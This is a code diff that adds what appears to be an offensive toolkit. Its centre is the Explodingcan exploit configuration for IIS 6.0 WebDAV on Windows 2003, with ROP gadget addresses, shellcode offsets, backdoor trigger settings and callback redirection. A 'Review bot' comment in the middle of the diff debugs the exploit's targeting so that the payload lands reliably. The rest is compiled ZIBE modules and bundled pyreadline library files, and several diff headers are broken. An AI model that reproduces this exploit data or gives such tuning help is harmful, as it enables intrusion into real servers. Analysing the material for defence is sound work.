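+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>7</default>
+</parameter>
+</paramgroup>
+<paramgroup name='User-Agent' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>40</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Via' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>8</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Warning' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>9</default>
+</parameter>
+</paramgroup>
+</paramchoice>
+<paramchoice name='BackdoorValueSource' description='Method of generating value for HTTP trigger header.'>
+<default>RandomEtag</default>
+<paramgroup name='Manual' description='Operator-controlled value.'>
+<parameter type='String' name='BackdoorValue' description='HTTP header value used to trigger backdoor.'/>
+</paramgroup>
+<paramgroup name='RandomEtag' description='Randomly generated HTTP Etag string.'>
+<parameter hidden='true' type='String' name='BackdoorValue' description=''>
+<default><RANDOM_ETAG></default>
+</parameter>
+</paramgroup>
+<paramgroup name='RandomBasicAuth' description='Randomly generated Basic Auth credential string.'>
+<parameter hidden='true' type='String' name='BackdoorValue' description=''>
+<default><RANDOM_BASIC_AUTH></default>
+</parameter>
+</paramgroup>
+</paramchoice>
+<parameter type='U32' name='BackdoorDelay' description='How long to wait (in seconds) for trigger responses.'>
+<default>10</default>
+</parameter>
+<parameter type='U32' name='BackdoorRetries' description='Maximum number of times to try triggering the backdoor.'>
+<default>1</default>
+</parameter>
+<parameter type='LocalFile' name='PccpPy' description='Full path to pccp.pyc.'>
+<value>D:\DSZOPSDISK\storage\pccp.pyc</value>
+</parameter>
+<parameter type='LocalFile' name='BackdoorBridgeDLL' description='Full path to IIS-backdoor-to-PC-host DLL.'>
+<value>D:\DSZOPSDISK\storage\brdg.dll</value>
+</parameter>
+<parameter type='LocalFile' name='PythonExe' description='Full path to Python [2.6] executable.'>
+<value>C:\Python26\python.exe</value>
+</parameter>
+</paramgroup>
+</paramchoice>
+<parameter type='IPv4' name='TargetIp' description='Target IP Address'/>
+<parameter type='TcpPort' name='TargetPort' description='Port of the HTTP service'>
+<default>80</default>
+</parameter>
+<parameter type='U16' name='NetworkTimeout' description='Network timeout (in seconds)'>
+<default>60</default>
+</parameter>
+<parameter type='Boolean' name='EnableSSL' description='Enable SSL for HTTPS targets'>
+<default>false</default>
+</parameter>
+<parameter type='U32' name='IISPathSize' description='Length of IIS path (between 3 and 68)'>
+<default>18</default>
+</parameter>
+<parameter type='String' name='hostString' description='String to use in HTTP requests'>
+<default>localhost</default>
+</parameter>
+<paramchoice name='AuthenticationType' description='Authentication type for target'>
+<default>None</default>
+<paramgroup name='None' description='No authentication'/>
+<paramgroup name='Basic' description='Basic HTTP authentication'>
+<parameter type='String' name='Username' description='Valid basic authenticiation username'/>
+<parameter type='String' name='Password' description='Valid basic authenticiation password'/>
+</paramgroup>
+</paramchoice>
+<parameter hidden='true' type='U32' name='buf1size' description=''>
+<value>0x110</value>
+</parameter>
+<parameter hidden='true' type='U32' name='buf2size' description=''>
+<value>0xc00</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SkipFree' description=''>
+<value>0x02020202</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SkipOffset' description=''>
+<value>0xDC</value>
+</parameter>
+<parameter hidden='true' type='U32' name='VirtualProtectOffset' description=''>
+<value>0x11C</value>
+</parameter>
+<parameter hidden='true' type='U32' name='WriteAddressOffset1' description=''>
+<value>0xE0</value>
+</parameter>
+<parameter hidden='true' type='U32' name='WriteAddressOffset2' description=''>
+<value>0x124</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ObjectAddress' description=''>
+<value>0x100</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ObjectAddressOffset1' description=''>
+<value>0x10C</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ObjectAddressOffset4' description=''>
+<value>0xFC</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ObjectAddressOffset2' description=''>
+<value>0xE8</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ObjectAddressOffset3' description=''>
+<value>0xD8</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEcxEspOffset' description=''>
+<value>0xFC</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjustOffset1' description=''>
+<value>0xDC</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjustOffset2' description=''>
+<value>0xE0</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjustOffset3' description=''>
+<value>0x138</value>
+</parameter>
+<parameter hidden='true' type='U32' name='Push40Offset' description=''>
+<value>0x10C</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LeaveRetOffset1' description=''>
+<value>0x134</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LeaveRetOffset2' description=''>
+<value>0x174</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SetEbp1' description=''>
+<value>0x174</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SetEbp1Offset' description=''>
+<value>0x130</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SetEbp2' description=''>
+<value>0x15C</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SetEbp2Offset' description=''>
+<value>0x14c</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SetEbp3' description=''>
+<value>0x138</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SetEbp3Offset' description=''>
+<value>0x170</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEbpOffset' description=''>
+<value>0x150</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ShellcodeAddr' description=''>
+<value>0x1a0</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ShellcodeAddrOffset' description=''>
+<value>0x118</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ShellcodeOffset' description=''>
+<value>0x178</value>
+</parameter>
+<parameter hidden='true' type='U32' name='JmpEBXOffset' description=''>
+<value>0x114</value>
+</parameter>
+<parameter hidden='true' type='U32' name='ProcHandleOffset' description=''>
+<value>0x120</value>
+</parameter>
+<parameter hidden='true' type='U32' name='VProtSizeOffset' description=''>
+<value>0x128</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEaxOffset' description=''>
+<value>0x138</value>
+</parameter>
+<parameter hidden='true' type='U32' name='EaxValOffset' description=''>
+<value>0x160</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax2Offset' description=''>
+<value>0x168</value>
+</parameter>
+<paramchoice name='Target' description='Target OS'>
+<paramgroup name='W2K3SP0' description='Windows 2003 Base'>
+<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
+<value>0x010021d0</value>
+</parameter>
+<parameter hidden='true' type='U32' name='WriteAddress' description=''>
+<value>0x01002030</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjust' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='Push40' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LeaveRet' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEbp' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='JmpEBX' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='VProtSize' description=''>
+<value>0x01002034</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax2' description=''>
+<value>0xffffffff</value>
+</parameter>
+</paramgroup>
+<paramgroup name='W2K3SP1' description='Windows 2003 Service Pack 1'>
+<parameter hidden='true' type='U32' name='WriteAddress' description=''>
+<value>0x01003030</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
+<value>0x68015cd2</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjust' description=''>
+<value>0x68006D5F</value>
+</parameter>
+<parameter hidden='true' type='U32' name='Push40' description=''>
+<value>0x6800B023</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LeaveRet' description=''>
+<value>0x6801277f</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEbp' description=''>
+<value>0x68006d15</value>
+</parameter>
+<parameter hidden='true' type='U32' name='JmpEBX' description=''>
+<value>0x6801227b</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
+<value>0x7ffe0300</value>
+</parameter>
+<parameter hidden='true' type='U32' name='VProtSize' description=''>
+<value>0x6802906c</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax' description=''>
+<value>0x680092a1</value>
+</parameter>
+<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
+<value>0x68008156</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax2' description=''>
+<value>0x680229a1</value>
+</parameter>
+</paramgroup>
+<paramgroup name='W2K3SP2' description='Windows 2003 Service Pack 2'>
+<parameter hidden='true' type='U32' name='WriteAddress' description=''>
+<value>0x680312C0</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
+<value>0x68016082</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjust' description=''>
+<value>0x68006E4F</value>
+</parameter>
+<parameter hidden='true' type='U32' name='Push40' description=''>
+<value>0x6800B113</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LeaveRet' description=''>
+<value>0x680129E7</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEbp' description=''>
+<value>0x68006e05</value>
+</parameter>
+<parameter hidden='true' type='U32' name='JmpEBX' description=''>
+<value>0x680124e3</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
+<value>0x7ffe0300</value>
+</parameter>
+<parameter hidden='true' type='U32' name='VProtSize' description=''>
+<value>0x6803046e</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax' description=''>
+<value>0x68009391</value>
+</parameter>
+<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
+<value>0x68008246</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax2' description=''>
+<value>0x68021daa</value>
+</parameter>
+</paramgroup>
+<paramgroup name='W2K3SP0_v5IM' description='Windows 2003 Base (IIS 5.0 Isolation Mode)'>
+<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
+<value>0x010043d0</value>
+</parameter>
+<parameter hidden='true' type='U32' name='WriteAddress' description=''>
+<value>0x01004230</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjust' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='Push40' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LeaveRet' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEbp' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='JmpEBX' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='VProtSize' description=''>
+<value>0x01004234</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
+<value>0xffffffff</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax2' description=''>
+<value>0xffffffff</value>
+</parameter>
+</paramgroup>
+<paramgroup name='W2K3SP1_v5IM' description='Windows 2003 Service Pack 1 (IIS 5.0 Isolation Mode)'>
+<parameter hidden='true' type='U32' name='WriteAddress' description=''>
+<value>0x01004200</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
+<value>0x68015cd2</value>
+</parameter>
+<parameter hidden='true' type='U32' name='StackAdjust' description=''>
+<value>0x68006D5F</value>
+</parameter>
+<parameter hidden='true' type='U32' name='Push40' description=''>
+<value>0x6800B023</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LeaveRet' description=''>
+<value>0x6801277f</value>
+</parameter>
+<parameter hidden='true' type='U32' name='MovEbp' description=''>
+<value>0x68006d15</value>
+</parameter>
+<parameter hidden='true' type='U32' name='JmpEBX' description=''>
+<value>0x6801227b</value>
+</parameter>
+<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
+<value>0x7ffe0300</value>
+</parameter>
+<parameter hidden='true' type='U32' name='VProtSize' description=''>
+<value>0x6802906c</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax' description=''>
+<value>0x680092a1</value>
+</parameter>
+<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
+<value>0x68008156</value>
+</parameter>
+<parameter hidden='true' type='U32' name='LoadEax2' description=''>
+<value>0x680229a1</value>
+</parameter>
+</paramgroup>
+</paramchoice>
+</inputparameters>
+<outputparameters>
+<paramchoice name='Contract' description='The contract fulfilled by this plugin'>
+<value>StagedUpload</value>
+<paramgroup name='StagedUpload' description=''>
+<parameter type='Socket' name='ConnectedTcp' description='The connected socket'/>
+<parameter type='U8' name='XorMask' description='Masking byte'/>
+</paramgroup>
+</paramchoice>
+</outputparameters>
+<errors>
+<errorcode name='EXCA_SUCCESS' value='EDF_SUCCESS' description='Explodingcan executed successfully.'/>
+</errors>
+<redirection>
+<local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='true' destaddr='TargetIp' destport='TargetPort'/>
+<local protocol='TCP' listenaddr='TargetIp' listenport='ListenLocalPort' closeoncompletion='true' destaddr='TargetIp' destport='ListenPort'/>
+<remote protocol='TCP' listenport='CallbackPort' listenaddr='CallbackIp' destport='CallbackLocalPort'/>
+</redirection>
+<logic>
+<and>
+<or>
+<service name='http'>
+<and>
+<product version='6.0' name='Microsoft IIS'/>
+<service name='http-option-propfind'>
+<bindtovalue name='EnableSSL' value='false'/>
+<bindtopath path="//service[name='http']/port" name='TargetPort'/>
+<bindtopath path="//service[name='http']/product/misc_product_info[name='IISPathSize']/value" name='IISPathSize'/>
+</service>
+</and>
+</service>
+<service name='https'>
+<and>
+<product version='6.0' name='Microsoft IIS'/>
+<service name='http-option-propfind'>
+<bindtovalue name='EnableSSL' value='true'/>
+<bindtopath path="//service[name='https']/port" name='TargetPort'/>
+<bindtopath path="//service[name='https']/product/misc_product_info[name='IISPathSize']/value" name='IISPathSize'/>
+</service>
+</and>
+</service>
+</or>
+<or>
+<os servicepack='2' name='Windows 2003' family='windows'>
+<bindtovalue name='Target' value='W2K3SP2'/>
+</os>
+<os servicepack='1' name='Windows 2003' family='windows'>
+<bindtovalue name='Target' value='W2K3SP1'/>
+</os>
+<os servicepack='0' name='Windows 2003' family='windows'>
+<bindtovalue name='Target' value='W2K3SP0'/>
+</os>
+<os servicepack='unknown' name='Windows 2003' family='windows'>
+<or>
+<os>
+<bindtovalue name='Target' value='W2K3SP2'/>
+</os>
+<os>
+<bindtovalue name='Target' value='W2K3SP0'/>
+</os>
+<os>
+<bindtovalue name='Target' value='W2K3SP1'/>
+</os>
+</or>
+</os>
+</or>
+<bindtovalue name='PayloadAccessType' value='Callback'/>
+</and>
+</logic>
+</config>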
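Review bot: The `W2K3SP0` and `W2K3SP0_v5IM` target groups each declare `MovEcxEsp` twice — first with a concrete address (`0x010021d0` / `0x010043d0`) and then again as `0xffffffff` — and every other gadget in those groups apart from `WriteAddress` and `VProtSize` is also `0xffffffff`, which reads as an unfinished placeholder table; which of the two `MovEcxEsp` values the loader keeps depends on the parser. The `<logic>` block nonetheless binds `Target` to `W2K3SP0` for `servicepack='0'` and offers it as an alternative for `servicepack='unknown'`, so auto-targeting can presumably select a chain that returns into `0xffffffff` and kills the IIS worker instead of landing the payload. Either drop the second `<parameter hidden='true' type='U32' name='MovEcxEsp'>` entry together with the two `W2K3SP0` bindings in `<logic>`, or leave the group with `<!-- SP0 gadget table incomplete; do not auto-select -->` — confirm against the exploit binary which value it actually consumes. Separately, neither `_v5IM` group is reachable from `<logic>`, so IIS 5.0 isolation-mode targets must be chosen by hand, and `'Local listen por'` and `'authenticiation'` are typos in operator-facing descriptions.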
BIN
windows/exploits/Explodingcan-2.0.2.exe
Normal file
Binary file not shown.
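--- a/windows/exploits/Explodingcan-2.0.2.fb
+++ b/windows/exploits/Explodingcan-2.0.2.fb
@@ -0,0 +1,32 @@
+<?xml version="1.0"?>
+<t:config id="9b6d2c7a836744e5cd54e4db262f09c67a5cae17"
+name="Explodingcan"
+version="2.0.2"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:touchlist>
+<t:plugin
+name="Iistouch"
+displayname="IIS Touch"
+description="Touch to get IIS Info."
+postmessage="Explodingcan requires WEBDAV on Windows 2003 IIS 6.0">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
+<t:ivparam name="EnableSSL" value="EnableSSL"/>
+</t:plugin>
+<t:plugin name="Explodingcantouch"
+displayname="ExplodingCan Touch"
+description="Determine the length of the path for IIS"
+postmessage="ExplodingCan requires the length of the IIS path">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="Protocol" value="Protocol"/>
+<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
+<t:ivparam name="maxSizeToCheck" value="maxSizeToCheck"/>
+<t:oparam name="IISPathSize" value="IISPathSize"/>
+<t:oparam name="hostString" value="hostString"/>
+</t:plugin>
+</t:touchlist>
+</t:config>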
BIN
windows/exploits/ZIBE/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/context_mgr.pyc
Normal file
BIN
windows/exploits/ZIBE/context_mgr.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/logs.pyc
Normal file
BIN
windows/exploits/ZIBE/logs.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugin_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugin_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/common.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/common.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/elist.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/elist.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/job_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/job_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/process_services.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/process_services.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/sam.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/sam.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/service_control_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/service_control_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/tunnel_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/tunnel_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/clipboard/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/clipboard/__init__.pyc
Normal file
Binary file not shown.
|
@ -0,0 +1,28 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import clr
|
||||
clr.AddReferenceByPartialName(u"System.Windows.Forms")
|
||||
import System.Windows.Forms.Clipboard as cb
|
||||
|
||||
def GetClipboardText():
|
||||
text = ""
|
||||
if cb.ContainsText():
|
||||
text = cb.GetText()
|
||||
|
||||
return text
|
||||
|
||||
def SetClipboardText(text):
|
||||
cb.SetText(text)
|
||||
|
||||
if __name__ == u'__main__':
|
||||
txt = GetClipboardText() # display last text clipped
|
||||
print txt
|
||||
|
||||
|
||||
|
||||
|
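--- a/windows/exploits/ZIBE/pyreadline/clipboard/no_clipboard.py
+++ b/windows/exploits/ZIBE/pyreadline/clipboard/no_clipboard.py
@@ -0,0 +1,18 @@
+# -*- coding: utf-8 -*-
+#*****************************************************************************
+# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
+#
+# Distributed under the terms of the BSD License. The full license is in
+# the file COPYING, distributed as part of this software.
+#*****************************************************************************
+
+
+mybuffer = u""
+
+def GetClipboardText():
+    return mybuffer
+
+def SetClipboardText(text):
+    global mybuffer
+    mybuffer = text
+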
BIN
windows/exploits/ZIBE/pyreadline/clipboard/win32_clipboard.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/clipboard/win32_clipboard.pyc
Normal file
Binary file not shown.
|
@ -0,0 +1,88 @@
|
|||
#Bind keys for exit (keys only work on empty lines
|
||||
#disable_readline(True) #Disable pyreadline completely.
|
||||
debug_output("off") #"on" saves log info to./pyreadline_debug_log.txt
|
||||
#"on_nologfile" only enables print warning messages
|
||||
bind_exit_key("Control-d")
|
||||
bind_exit_key("Control-z")
|
||||
|
||||
#Commands for moving
|
||||
bind_key("Home", "beginning_of_line")
|
||||
bind_key("End", "end_of_line")
|
||||
bind_key("Left", "backward_char")
|
||||
bind_key("Control-b", "backward_char")
|
||||
bind_key("Right", "forward_char")
|
||||
bind_key("Control-f", "forward_char")
|
||||
bind_key("Alt-f", "forward_word")
|
||||
bind_key("Alt-b", "backward_word")
|
||||
bind_key("Clear", "clear_screen")
|
||||
bind_key("Control-l", "clear_screen")
|
||||
bind_key("Control-a", "beginning_of_line")
|
||||
bind_key("Control-e", "end_of_line")
|
||||
#bind_key("Control-l", "redraw_current_line")
|
||||
|
||||
#Commands for Manipulating the History
|
||||
bind_key("Return", "accept_line")
|
||||
bind_key("Control-p", "previous_history")
|
||||
bind_key("Control-n", "next_history")
|
||||
bind_key("Up", "history_search_backward")
|
||||
bind_key("Down", "history_search_forward")
|
||||
bind_key("Alt-<", "beginning_of_history")
|
||||
bind_key("Alt->", "end_of_history")
|
||||
bind_key("Control-r", "reverse_search_history")
|
||||
bind_key("Control-s", "forward_search_history")
|
||||
bind_key("Alt-p", "non_incremental_reverse_search_history")
|
||||
bind_key("Alt-n", "non_incremental_forward_search_history")
|
||||
|
||||
bind_key("Control-z", "undo")
|
||||
bind_key("Control-_", "undo")
|
||||
|
||||
#Commands for Changing Text
|
||||
bind_key("Delete", "delete_char")
|
||||
bind_key("Control-d", "delete_char")
|
||||
bind_key("BackSpace", "backward_delete_char")
|
||||
#bind_key("Control-Shift-v", "quoted_insert")
|
||||
bind_key("Control-space", "self_insert")
|
||||
bind_key("Control-BackSpace", "backward_delete_word")
|
||||
|
||||
#Killing and Yanking
|
||||
bind_key("Control-k", "kill_line")
|
||||
bind_key("Control-shift-k", "kill_whole_line")
|
||||
bind_key("Escape", "kill_whole_line")
|
||||
bind_key("Meta-d", "kill_word")
|
||||
bind_key("Control-w", "unix_word_rubout")
|
||||
#bind_key("Control-Delete", "forward_kill_word")
|
||||
|
||||
#Copy paste
|
||||
bind_key("Shift-Right", "forward_char_extend_selection")
|
||||
bind_key("Shift-Left", "backward_char_extend_selection")
|
||||
bind_key("Shift-Control-Right", "forward_word_extend_selection")
|
||||
bind_key("Shift-Control-Left", "backward_word_extend_selection")
|
||||
bind_key("Control-m", "set_mark")
|
||||
|
||||
bind_key("Control-Shift-x", "copy_selection_to_clipboard")
|
||||
#bind_key("Control-c", "copy_selection_to_clipboard") #Needs allow_ctrl_c(True) below to be uncommented
|
||||
bind_key("Control-q", "copy_region_to_clipboard")
|
||||
bind_key('Control-Shift-v', "paste_mulitline_code")
|
||||
bind_key("Control-x", "cut_selection_to_clipboard")
|
||||
|
||||
bind_key("Control-v", "paste")
|
||||
bind_key("Control-y", "yank")
|
||||
bind_key("Alt-v", "ipython_paste")
|
||||
|
||||
#Unbinding keys:
|
||||
#un_bind_key("Home")
|
||||
|
||||
#Other
|
||||
bell_style("none") #modes: none, audible, visible(not implemented)
|
||||
show_all_if_ambiguous("on")
|
||||
mark_directories("on")
|
||||
completer_delims(" \t\n\"\\'`@$><=;|&{(?")
|
||||
complete_filesystem("off")
|
||||
debug_output("off")
|
||||
#allow_ctrl_c(True) #(Allows use of ctrl-c as copy key, still propagate keyboardinterrupt when not waiting for input)
|
||||
|
||||
history_filename("~/.pythonhistory")
|
||||
history_length(200) #value of -1 means no limit
|
||||
|
||||
#set_mode("vi") #will cause following bind_keys to bind to vi mode as well as activate vi mode
|
||||
#ctrl_c_tap_time_interval(0.3)
|
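--- a/windows/exploits/ZIBE/pyreadline/configuration/startup.py
+++ b/windows/exploits/ZIBE/pyreadline/configuration/startup.py
@@ -0,0 +1,30 @@
+# -*- coding: UTF-8 -*-
+# Example snippet to use in a PYTHONSTARTUP file
+try:
+    import pyreadline.rlmain
+    #pyreadline.rlmain.config_path=r"c:\xxx\pyreadlineconfig.ini"
+    import readline,atexit
+    import pyreadline.unicode_helper
+    #
+    #
+    #Normally the codepage for pyreadline is set to be sys.stdout.encoding
+    #if you need to change this uncomment the following line
+    #pyreadline.unicode_helper.pyreadline_codepage="utf8"
+except ImportError:
+    print "Module readline not available."
+else:
+    #import tab completion functionality
+    import rlcompleter
+
+    #Override completer from rlcompleter to disable automatic ( on callable
+    completer_obj = rlcompleter.Completer()
+    def nop(val, word):
+        return word
+    completer_obj._callable_postfix = nop
+    readline.set_completer(completer_obj.complete)
+
+    #activate tab completion
+    readline.parse_and_bind("tab: complete")
+    readline.read_history_file()
+    atexit.register(readline.write_history_file)
+    del readline,rlcompleter,atexit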
BIN
windows/exploits/ZIBE/pyreadline/console/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/console/__init__.pyc
Normal file
Binary file not shown.
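--- a/windows/exploits/ZIBE/pyreadline/console/ansi.py
+++ b/windows/exploits/ZIBE/pyreadline/console/ansi.py
@@ -0,0 +1,190 @@
+# -*- coding: ISO-8859-1 -*-
+import re,sys,os
+
+terminal_escape = re.compile(u'(\001?\033\\[[0-9;]*m\002?)')
+escape_parts = re.compile(u'\001?\033\\[([0-9;]*)m\002?')
+
+
+class AnsiState(object):
+    def __init__(self,bold=False,inverse=False,color=u"white",background=u"black",backgroundbold=False):
+        self.bold = bold
+        self.inverse = inverse
+        self.color = color
+        self.background = background
+        self.backgroundbold = backgroundbold
+
+    trtable = {u"black":0, u"red":4, u"green":2, u"yellow":6,
+               u"blue":1, u"magenta":5, u"cyan":3, u"white":7}
+    revtable = dict(zip(trtable.values(),trtable.keys()))
+    def get_winattr(self):
+        attr = 0
+        if self.bold:
+            attr |= 0x0008
+        if self.backgroundbold:
+            attr |= 0x0080
+        if self.inverse:
+            attr |= 0x4000
+        attr |= self.trtable[self.color]
+        attr |= (self.trtable[self.background] << 4)
+        return attr
+
+    def set_winattr(self, attr):
+        self.bold = bool(attr & 0x0008)
+        self.backgroundbold = bool(attr & 0x0080)
+        self.inverse = bool(attr & 0x4000)
+        self.color = self.revtable[attr & 0x0007]
+        self.background = self.revtable[(attr & 0x0070) >> 4]
+
+    winattr=property(get_winattr,set_winattr)
+    def __repr__(self):
+        return u'AnsiState(bold=%s,inverse=%s,color=%9s,' \
+               u'background=%9s,backgroundbold=%s)# 0x%x'% \
+               (self.bold, self.inverse, '"%s"'%self.color,
+                '"%s"'%self.background, self.backgroundbold,
+                self.winattr)
+
+    def copy(self):
+        x = AnsiState()
+        x.bold = self.bold
+        x.inverse = self.inverse
+        x.color = self.color
+        x.background = self.background
+        x.backgroundbold = self.backgroundbold
+        return x
+
+defaultstate = AnsiState(False,False,u"white")
+
+trtable = {0:u"black", 1:u"red", 2:u"green", 3:u"yellow",
+           4:u"blue", 5:u"magenta", 6:u"cyan", 7:u"white"}
+
+class AnsiWriter(object):
+    def __init__(self, default=defaultstate):
+        if isinstance(defaultstate, AnsiState):
+            self.defaultstate = default
+        else:
+            self.defaultstate=AnsiState()
+            self.defaultstate.winattr = defaultstate
+
+
+    def write_color(self,text, attr=None):
+        u'''write text at current cursor position and interpret color escapes.
+
+        return the number of characters written.
+        '''
+        if isinstance(attr,AnsiState):
+            defaultstate = attr
+        elif attr is None: #use attribute form initial console
+            attr = self.defaultstate.copy()
+        else:
+            defaultstate = AnsiState()
+            defaultstate.winattr = attr
+            attr = defaultstate
+        chunks = terminal_escape.split(text)
+        n = 0 # count the characters we actually write, omitting the escapes
+        res=[]
+        for chunk in chunks:
+            m = escape_parts.match(chunk)
+            if m:
+                parts = m.group(1).split(u";")
+                if len(parts) == 1 and parts[0] == u"0":
+                    attr = self.defaultstate.copy()
+                    continue
+                for part in parts:
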